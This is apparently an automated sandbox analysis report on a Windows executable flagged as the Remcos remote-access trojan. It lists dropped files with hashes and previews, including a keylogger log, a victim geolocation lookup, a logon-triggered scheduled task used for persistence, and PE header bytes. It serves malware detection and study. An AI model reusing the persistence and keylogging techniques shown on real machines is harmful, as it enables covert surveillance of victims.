Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
File Type:data
Category:dropped
Size (bytes):144
Entropy (8bit):3.373583598653465
Encrypted:false
SSDEEP:3:rhlKlyKmyfNlJlWFi5JWRal2Jl+7R0DAlBG45klovDl6v:6lZmyhb5YcIeeDAlOWAv
MD5:0D7004FECAC2A7724C5BC83EE77BCB0F
SHA1:BBFC7A2967C7479D4C738436A1ECC55F4FD3B555
SHA-256:6162228789E2B12F170C6DDB04B39B0D8F25680A57848648869CBD70C0880899
SHA-512:97A1680811A6E6091ED00D451885C8D8137F500EE7E761ED09F07EF8023A45EE9F8441F1C2F478C5ACA652831ED6F72794311E63C8D0E355C8236B32CFE29E08
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:..[2024/12/05 12:25:37 Offline Keylogger Started]....[Program Manager]..
Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1216
Entropy (8bit):5.34331486778365
Encrypted:false
SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:1330C80CAAC9A0FB172F202485E9B1E8
SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process:C:\Users\user\Desktop\LdSbZG1iH6.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1216
Entropy (8bit):5.34331486778365
Encrypted:false
SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:1330C80CAAC9A0FB172F202485E9B1E8
SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
File Type:JSON data
Category:dropped
Size (bytes):963
Entropy (8bit):5.014904284428935
Encrypted:false
SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:B66CFB6461E507BB577CDE91F270844E
SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
Malicious:false
Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2232
Entropy (8bit):5.379460230152629
Encrypted:false
SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:FC2D360EC9CA945C562E3B5C1685B424
SHA1:4B69CCEDE2E97E9F699C76EE0148C105E7D6FFA4
SHA-256:7BB70E950D7A4B6C6047A44D4F722245B5E872228CF58FA2005FEE27979C25CF
SHA-512:2C22E9797C5124D72B70493DBD64AA9C331A5B647BD2A0AD3E46DB8AAF10CFE3AD9274E525F83B19A8EDBC4E419DCCA32BA081E8D8D5D1F0D14A57639B0C50AD
Malicious:false
Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):4736
Entropy (8bit):3.237864095579834
Encrypted:false
SSDEEP:96:pwpwickXkkXfkuguWQ0QA0QI0Qgh0QXb0QL0Q9GU4gUXu1szeuzSzbxGQI5lmf8C:pJle+uig8DoeyOkN4t
MD5:2587D5BB319FE0D87285665A473CDD80
SHA1:8C35DCD11A7701EB2EBD00741FFCE015269BF13A
SHA-256:82CD9BBBC801168610BC78C4B000FAB0F1DDF9AF8E940523D1A0DC9D7C08390D
SHA-512:9873F68CB5C63FBD119646FC7B467F309A060D8E0A59107FC6AD1FE652D31AAC4E8C79B0853843B85C531B93DCB8C804193D2AEF19660EF0F08243DAA2179917
Malicious:false
Preview:....Snapshot statistics:..- Signature                : PSSD..- Flags/CaptureFlags       : 00000009/d00039ff..- Aux pages                : 1 entries long..- VA space stream          : 2640 bytes in size..- Handle trace stream      : 0 bytes in size..- Handle stream            : 640 bytes in size..- Threads                  : 1 threads..- Thread stream            : 832 bytes in size....Snapshot performance counters:..- TotalCycleCount          : 2535136 cycles..- VaCloneCycleCount        :
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x829fa422, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20447232
                                                                                                                                              Entropy (8bit):1.2821197718047688
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:6dg6eIi7CKqOfvODR2d+SW5cN/FgHhg/6F:DIZfDU+
                                                                                                                                              MD5:408EBB83084D079444B7977D9FAE1B94
                                                                                                                                              SHA1:3C85CD2D6A62AE2D1873CC4C247A45E0912A945F
                                                                                                                                              SHA-256:33A24805203BF0D0B91863352E06B4E87ADAB4FFB65085F8B7C773D4165F1DC6
                                                                                                                                              SHA-512:4849D0C6561CEE7F7A226727D2321D5D8F7359E2AAA28B9415425BDA8D3171998F56F4FF1BC56A93BBE8E38FB6BB443D06411DDA0226B3DF9884F0803B482640
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..."... ........=......J}...0...{........................#..........{..;....{O.h.%..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;....................................P;....{O...................P.;....{O..........................#......h.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1575
                                                                                                                                              Entropy (8bit):5.1143780321897125
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtai5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT/v
                                                                                                                                              MD5:0A9B3B9F96AC38AA30726F501E4DF92B
                                                                                                                                              SHA1:00EEE4F457C16587B9A2C4AE2AC5C5F8429E6EC4
                                                                                                                                              SHA-256:B18D9D8D7199E988CB79B5930DC87FDF86C8DB365BA15B05F743E787004E7432
                                                                                                                                              SHA-512:6855B34166B539B8ED317386225BA704BFD70D8D3975757FC364FB08039C6B06219ECE2280934E6BF748FEB0FD0B0691392CA44F3235C40F7CCE646FA453D420
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1575
                                                                                                                                              Entropy (8bit):5.1143780321897125
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtai5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT/v
                                                                                                                                              MD5:0A9B3B9F96AC38AA30726F501E4DF92B
                                                                                                                                              SHA1:00EEE4F457C16587B9A2C4AE2AC5C5F8429E6EC4
                                                                                                                                              SHA-256:B18D9D8D7199E988CB79B5930DC87FDF86C8DB365BA15B05F743E787004E7432
                                                                                                                                              SHA-512:6855B34166B539B8ED317386225BA704BFD70D8D3975757FC364FB08039C6B06219ECE2280934E6BF748FEB0FD0B0691392CA44F3235C40F7CCE646FA453D420
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..

Process: C:\Users\user\Desktop\LdSbZG1iH6.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 1012224
Entropy (8bit): 7.866911689636022
Encrypted: false
SSDEEP: 24576:X2leFeHHdWGhuvZJY9JuynjHOMt33ylD9ESMAwL1zGUxj:GsFsHthuvZJunjHOY32nMAwxL
MD5: B2618FBB2E344DBDC7D4B33947D71531
SHA1: A56C4724EDEF9A8FEF490520ECAEB30C8356E314
SHA-256: 04E6DDA7961928FADEECD13E02B9195D31A5E3A9925D4DE51072089BC7A1B452
SHA-512: 1CA8727770D6458785C1206E81FA6F69675AFB521944A9206197BCC9737A81AFEA2A462BF93BBFBE836B841038E01C354FD9D2ABDD902F13187A970A4EDE6B57
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 68%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..h............... ........@.. ....................................@.....................................O....................................t..p............................................ ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............p..............@..B.......................H.......PI..\'...........p..p..............................................}.....(.......(.......s#...}....*.0............(.....s......o.....*B..{......o%....*B..{......o$....*.0............{....(.......(....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0..5.........s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.

Process: C:\Users\user\Desktop\LdSbZG1iH6.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.866911689636022
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: LdSbZG1iH6.exe
File size: 1'012'224 bytes
MD5: b2618fbb2e344dbdc7d4b33947d71531
SHA1: a56c4724edef9a8fef490520ecaeb30c8356e314
SHA256: 04e6dda7961928fadeecd13e02b9195d31a5e3a9925d4de51072089bc7a1b452
SHA512: 1ca8727770d6458785c1206e81fa6f69675afb521944a9206197bcc9737a81afea2a462bf93bbfbe836b841038e01c354fd9d2abdd902f13187a970a4ede6b57
SSDEEP: 24576:X2leFeHHdWGhuvZJY9JuynjHOMt33ylD9ESMAwL1zGUxj:GsFsHthuvZJunjHOY32nMAwxL
TLSH: 202512912922E906C8E24BB01961D3F857354EDCA816D717FBDE7DEBBE2B30A3484351
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..h............... ........@.. ....................................@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4f870e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xD19BF8C7 [Mon Jun 9 01:58:31 2081 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above is repeated 97 times in the original listing: the bytes following the entrypoint jmp are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xf86b9          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xfa000          0x59c         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xfc000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xf741c          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
